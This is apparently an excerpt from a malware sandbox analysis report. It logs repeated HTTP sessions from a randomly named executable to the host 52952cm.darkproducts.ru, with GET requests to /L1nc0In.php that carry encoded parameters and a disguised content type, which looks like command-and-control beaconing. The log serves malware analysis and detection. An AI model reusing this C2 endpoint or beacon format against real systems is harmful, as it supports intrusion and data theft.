Jan 3, 2025 17:03:03.574347019 CET	934	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 16:03:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rdVKq9anjOWnL6oRGLL%2FfPXN5LgS3d7I1fTbsF%2Br0hydDfmZD0YQZYFmnkZFYGntRwMxROBjhsM3oPgZEKiYmO57DU2lphbkagI%2BLkQX0K8OhH4TUhw7btUf55bxydPdKAT14KfIhJplKQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc437799d69c445-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1643&min_rtt=1643&rtt_var=821&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=2288&delivery_rate=0&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 43 4f 7a 41 7a 4e 6b 4e 6a 5a 30 49 57 5a 35 6b 7a 59 78 4d 6a 4e 68 68 54 4d 6a 4e 6a 5a 32 59 6a 4e 77 59 47 4e 6d 56 47 4f 79 49 79 65 36 49 69 5a 6d 46 54 59 69 4e 6d 4d 68 46 7a 4d 32 49 32 59 7a 45 54 59 7a 49 44 5a 77 59 54 4d 78 63 44 4f 79 59 7a 4d 79 51 6d 59 77 49 79 65 0d 0a 30 0d 0a 0d 0a Data Ascii: 68==Qf9JiI6ICOzAzNkNjZ0IWZ5kzYxMjNhhTMjNjZ2YjNwYGNmVGOyIye6IiZmFTYiNmMhFzM2I2YzETYzIDZwYTMxcDOyYzMyQmYwIye0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49988	104.21.12.142	80	1996	C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 17:03:08.583969116 CET	2288	OUT	GET /L1nc0In.php?lLbOTJND4EABolvu=fYZ80OdDWnHU7ctDgUbHuaY&BCv6bviL1ERLqfv77K7gGs7mR7=RUn8EA&7xcglkE6d2LiXAieJkd=sSFJpdnR0OFMKFi8eajXbJPEask&32871044d9857829fea250badeba4e34=QYyIzM5QzY4ADNxUDZ3MGOlZTM5QGZ1IDMhlTMhFzN3YGO3gTNjVmZ3MjN1gDN3IDMyADM0MTO&c6a92fac9f4420a60e173afb34e4bea8=gYzkzNhNDO4kDMiVDMzcTYlhjM1AzMkFGOlNjYkRmM1EWN0IjYxIWO&663ab9543bb1bc3f42c02aa5bdad15c2=d1nI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W&f24062a88e588068d9b244b061fdb4b2=0VfiIiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: 52952cm.darkproducts.ru Connection: Keep-Alive
Jan 3, 2025 17:03:09.303721905 CET	936	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 16:03:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SAOcp%2FJxNZCOB0y%2Fm1lXsKoJnlXd0NXUVCeqtbGsd1cjTpkiZHp%2BbmYSzpqQr845kA3rEcSWlSZADL7FT%2F5zzN8GC79DUJNgeC7ZKDvNx7zrPYvSMCXM9Fd5tPPekuTfHBG0EChwtUiHRQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc4379d4ae64243-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1754&min_rtt=1754&rtt_var=877&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=2288&delivery_rate=0&cwnd=191&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 43 4f 7a 41 7a 4e 6b 4e 6a 5a 30 49 57 5a 35 6b 7a 59 78 4d 6a 4e 68 68 54 4d 6a 4e 6a 5a 32 59 6a 4e 77 59 47 4e 6d 56 47 4f 79 49 79 65 36 49 69 5a 6d 46 54 59 69 4e 6d 4d 68 46 7a 4d 32 49 32 59 7a 45 54 59 7a 49 44 5a 77 59 54 4d 78 63 44 4f 79 59 7a 4d 79 51 6d 59 77 49 79 65 0d 0a 30 0d 0a 0d 0a Data Ascii: 68==Qf9JiI6ICOzAzNkNjZ0IWZ5kzYxMjNhhTMjNjZ2YjNwYGNmVGOyIye6IiZmFTYiNmMhFzM2I2YzETYzIDZwYTMxcDOyYzMyQmYwIye0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49989	104.21.12.142	80	1996	C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 17:03:14.318795919 CET	2288	OUT	GET /L1nc0In.php?lLbOTJND4EABolvu=fYZ80OdDWnHU7ctDgUbHuaY&BCv6bviL1ERLqfv77K7gGs7mR7=RUn8EA&7xcglkE6d2LiXAieJkd=sSFJpdnR0OFMKFi8eajXbJPEask&32871044d9857829fea250badeba4e34=QYyIzM5QzY4ADNxUDZ3MGOlZTM5QGZ1IDMhlTMhFzN3YGO3gTNjVmZ3MjN1gDN3IDMyADM0MTO&c6a92fac9f4420a60e173afb34e4bea8=gYzkzNhNDO4kDMiVDMzcTYlhjM1AzMkFGOlNjYkRmM1EWN0IjYxIWO&663ab9543bb1bc3f42c02aa5bdad15c2=d1nI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W&f24062a88e588068d9b244b061fdb4b2=0VfiIiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: 52952cm.darkproducts.ru Connection: Keep-Alive
Jan 3, 2025 17:03:15.032783031 CET	938	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 16:03:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VOLPeMY5yojTdTN1Zqf7T0DaAh1BN6opv3s%2FO310OrKsG90vsD191WxyCu9BFpLKuy%2BhVc2G9B1P9su9jEMOtL%2FRrvvNTK5s%2B5jIhFzzNSqIacc7%2B7TeccXsTMtaADZANhSsoEAb4Ydnhg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc437c13c601a3c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1895&min_rtt=1895&rtt_var=947&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=2288&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 43 4f 7a 41 7a 4e 6b 4e 6a 5a 30 49 57 5a 35 6b 7a 59 78 4d 6a 4e 68 68 54 4d 6a 4e 6a 5a 32 59 6a 4e 77 59 47 4e 6d 56 47 4f 79 49 79 65 36 49 69 5a 6d 46 54 59 69 4e 6d 4d 68 46 7a 4d 32 49 32 59 7a 45 54 59 7a 49 44 5a 77 59 54 4d 78 63 44 4f 79 59 7a 4d 79 51 6d 59 77 49 79 65 0d 0a 30 0d 0a 0d 0a Data Ascii: 68==Qf9JiI6ICOzAzNkNjZ0IWZ5kzYxMjNhhTMjNjZ2YjNwYGNmVGOyIye6IiZmFTYiNmMhFzM2I2YzETYzIDZwYTMxcDOyYzMyQmYwIye0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49990	104.21.12.142	80	1996	C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 17:03:20.052617073 CET	2288	OUT	GET /L1nc0In.php?lLbOTJND4EABolvu=fYZ80OdDWnHU7ctDgUbHuaY&BCv6bviL1ERLqfv77K7gGs7mR7=RUn8EA&7xcglkE6d2LiXAieJkd=sSFJpdnR0OFMKFi8eajXbJPEask&32871044d9857829fea250badeba4e34=QYyIzM5QzY4ADNxUDZ3MGOlZTM5QGZ1IDMhlTMhFzN3YGO3gTNjVmZ3MjN1gDN3IDMyADM0MTO&c6a92fac9f4420a60e173afb34e4bea8=gYzkzNhNDO4kDMiVDMzcTYlhjM1AzMkFGOlNjYkRmM1EWN0IjYxIWO&663ab9543bb1bc3f42c02aa5bdad15c2=d1nI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W&f24062a88e588068d9b244b061fdb4b2=0VfiIiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: 52952cm.darkproducts.ru Connection: Keep-Alive
Jan 3, 2025 17:03:20.784693003 CET	931	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 16:03:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MnXpuOzA40ZiYNSXgCjWdTVnEYg3b3oX89ADPn0XjHUch1CuZAtsxz45U%2F1T8obfwAm3GHsjTQIS9pkCB2uffuRbYw3nU6BbKB8L%2FbF31MCVamAeMaGgqD5qOyjC%2F3TJEJE%2BKex5guK1SQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc437e4fee40c82-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1664&min_rtt=1664&rtt_var=832&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=2288&delivery_rate=0&cwnd=206&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 43 4f 7a 41 7a 4e 6b 4e 6a 5a 30 49 57 5a 35 6b 7a 59 78 4d 6a 4e 68 68 54 4d 6a 4e 6a 5a 32 59 6a 4e 77 59 47 4e 6d 56 47 4f 79 49 79 65 36 49 69 5a 6d 46 54 59 69 4e 6d 4d 68 46 7a 4d 32 49 32 59 7a 45 54 59 7a 49 44 5a 77 59 54 4d 78 63 44 4f 79 59 7a 4d 79 51 6d 59 77 49 79 65 0d 0a Data Ascii: 68==Qf9JiI6ICOzAzNkNjZ0IWZ5kzYxMjNhhTMjNjZ2YjNwYGNmVGOyIye6IiZmFTYiNmMhFzM2I2YzETYzIDZwYTMxcDOyYzMyQmYwIye
Jan 3, 2025 17:03:20.920105934 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49991	104.21.12.142	80	1996	C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 17:03:25.943257093 CET	2264	OUT	GET /L1nc0In.php?lLbOTJND4EABolvu=fYZ80OdDWnHU7ctDgUbHuaY&BCv6bviL1ERLqfv77K7gGs7mR7=RUn8EA&7xcglkE6d2LiXAieJkd=sSFJpdnR0OFMKFi8eajXbJPEask&32871044d9857829fea250badeba4e34=QYyIzM5QzY4ADNxUDZ3MGOlZTM5QGZ1IDMhlTMhFzN3YGO3gTNjVmZ3MjN1gDN3IDMyADM0MTO&c6a92fac9f4420a60e173afb34e4bea8=gYzkzNhNDO4kDMiVDMzcTYlhjM1AzMkFGOlNjYkRmM1EWN0IjYxIWO&663ab9543bb1bc3f42c02aa5bdad15c2=d1nI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W&f24062a88e588068d9b244b061fdb4b2=0VfiIiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: 52952cm.darkproducts.ru
Jan 3, 2025 17:03:26.665169001 CET	943	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 16:03:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2FPPY6idAu2TumqWzQq%2FtX6pq%2Fe6hy9qA8%2FtYARypK5vtAQh%2Fdcr1YXNfS6FGVQ1qiTSOrPvRiy%2F8oKvlTXrxYVs8pP2FoYhjVbiyTE7PP%2FGotzITJFDHVnLY%2FLptaOGk6IAobqwe5LspA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc43809bc0872a5-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2065&min_rtt=2065&rtt_var=1032&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=2264&delivery_rate=0&cwnd=205&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 43 4f 7a 41 7a 4e 6b 4e 6a 5a 30 49 57 5a 35 6b 7a 59 78 4d 6a 4e 68 68 54 4d 6a 4e 6a 5a 32 59 6a 4e 77 59 47 4e 6d 56 47 4f 79 49 79 65 36 49 69 5a 6d 46 54 59 69 4e 6d 4d 68 46 7a 4d 32 49 32 59 7a 45 54 59 7a 49 44 5a 77 59 54 4d 78 63 44 4f 79 59 7a 4d 79 51 6d 59 77 49 79 65 0d 0a 30 0d 0a 0d 0a Data Ascii: 68==Qf9JiI6ICOzAzNkNjZ0IWZ5kzYxMjNhhTMjNjZ2YjNwYGNmVGOyIye6IiZmFTYiNmMhFzM2I2YzETYzIDZwYTMxcDOyYzMyQmYwIye0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49992	104.21.12.142	80	1996	C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 17:03:31.677973032 CET	2288	OUT	GET /L1nc0In.php?lLbOTJND4EABolvu=fYZ80OdDWnHU7ctDgUbHuaY&BCv6bviL1ERLqfv77K7gGs7mR7=RUn8EA&7xcglkE6d2LiXAieJkd=sSFJpdnR0OFMKFi8eajXbJPEask&32871044d9857829fea250badeba4e34=QYyIzM5QzY4ADNxUDZ3MGOlZTM5QGZ1IDMhlTMhFzN3YGO3gTNjVmZ3MjN1gDN3IDMyADM0MTO&c6a92fac9f4420a60e173afb34e4bea8=gYzkzNhNDO4kDMiVDMzcTYlhjM1AzMkFGOlNjYkRmM1EWN0IjYxIWO&663ab9543bb1bc3f42c02aa5bdad15c2=d1nI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W&f24062a88e588068d9b244b061fdb4b2=0VfiIiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: 52952cm.darkproducts.ru Connection: Keep-Alive
Jan 3, 2025 17:03:32.403667927 CET	932	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 16:03:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fABwMgYGMDo8xNV7c%2BMpzbI4nR2hkdq7LghJxXibhr4CiKkp7nx8K77FxIUKGFPG1FpGgXb1GS68nyq%2BfQBXrujpaZFUTfJqSVknaRsTukHu4LDzcyaNVwVH2waUdYnUrh9pqfKRlepGCA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc4382daa1c4288-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1874&min_rtt=1874&rtt_var=937&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=2288&delivery_rate=0&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 43 4f 7a 41 7a 4e 6b 4e 6a 5a 30 49 57 5a 35 6b 7a 59 78 4d 6a 4e 68 68 54 4d 6a 4e 6a 5a 32 59 6a 4e 77 59 47 4e 6d 56 47 4f 79 49 79 65 36 49 69 5a 6d 46 54 59 69 4e 6d 4d 68 46 7a 4d 32 49 32 59 7a 45 54 59 7a 49 44 5a 77 59 54 4d 78 63 44 4f 79 59 7a 4d 79 51 6d 59 77 49 79 65 0d 0a 30 0d 0a 0d 0a Data Ascii: 68==Qf9JiI6ICOzAzNkNjZ0IWZ5kzYxMjNhhTMjNjZ2YjNwYGNmVGOyIye6IiZmFTYiNmMhFzM2I2YzETYzIDZwYTMxcDOyYzMyQmYwIye0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49993	104.21.12.142	80	1996	C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe

Timestamp	Bytes transferred	Direction	Data
Jan 3, 2025 17:03:37.412955999 CET	2288	OUT	GET /L1nc0In.php?lLbOTJND4EABolvu=fYZ80OdDWnHU7ctDgUbHuaY&BCv6bviL1ERLqfv77K7gGs7mR7=RUn8EA&7xcglkE6d2LiXAieJkd=sSFJpdnR0OFMKFi8eajXbJPEask&32871044d9857829fea250badeba4e34=QYyIzM5QzY4ADNxUDZ3MGOlZTM5QGZ1IDMhlTMhFzN3YGO3gTNjVmZ3MjN1gDN3IDMyADM0MTO&c6a92fac9f4420a60e173afb34e4bea8=gYzkzNhNDO4kDMiVDMzcTYlhjM1AzMkFGOlNjYkRmM1EWN0IjYxIWO&663ab9543bb1bc3f42c02aa5bdad15c2=d1nI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMis3W&f24062a88e588068d9b244b061fdb4b2=0VfiIiOiMTM3YTO5UGZ0MjYhVWZkZGMiJWOlVGN4kjYklDOhhTNiwiI3czYxQWO5ETNycjYwgzN2cjNzgTMjNjZ5MzMwMWNzMjZxQ2Y4MDN0IiOigDOwgzN1UTZ0U2N4YGZ0IDZ5UDZ1EzY5UDMlJGZ4IGMiwiI1gTYyY2Y0MzM5cTOjVzNwEzM5IGNyEWZ0YTNlBDZiRmMyI2YyEjZlJiOikTM5EWYjZ2NykjNmZWOmhDM1ImM3AzN5QGN0UmNyQDMisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k [TRUNCATED] Accept: / Content-Type: text/css User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: 52952cm.darkproducts.ru Connection: Keep-Alive
Jan 3, 2025 17:03:38.101046085 CET	942	IN	HTTP/1.1 200 OK Date: Fri, 03 Jan 2025 16:03:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UU0LhsNyLEIq1hGQQKN7irTZRJcpHs7VjmQ%2F%2B%2BysUSma1K1SMXGpDiXiiQG7cvxUlDVWg5xB8ZR0Xdwtjk6pJtk9PIvrc9g3dXOUj%2BQJX2zaqzW%2FYKsxKj5cdK2i4Tmd6F4Q5%2Bdoh6h%2FtA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc438515f6e15d7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1516&min_rtt=1516&rtt_var=758&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=2288&delivery_rate=0&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 43 4f 7a 41 7a 4e 6b 4e 6a 5a 30 49 57 5a 35 6b 7a 59 78 4d 6a 4e 68 68 54 4d 6a 4e 6a 5a 32 59 6a 4e 77 59 47 4e 6d 56 47 4f 79 49 79 65 36 49 69 5a 6d 46 54 59 69 4e 6d 4d 68 46 7a 4d 32 49 32 59 7a 45 54 59 7a 49 44 5a 77 59 54 4d 78 63 44 4f 79 59 7a 4d 79 51 6d 59 77 49 79 65 0d 0a 30 0d 0a 0d 0a Data Ascii: 68==Qf9JiI6ICOzAzNkNjZ0IWZ5kzYxMjNhhTMjNjZ2YjNwYGNmVGOyIye6IiZmFTYiNmMhFzM2I2YzETYzIDZwYTMxcDOyYzMyQmYwIye0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	49994	104.21.12.142	80	1996	C:\Windows\Offline Web Pages\uVyodHPItdaFNnFIblVMLhppqvOTKO.exe

Timestamp	Bytes transferred	Direction	Data
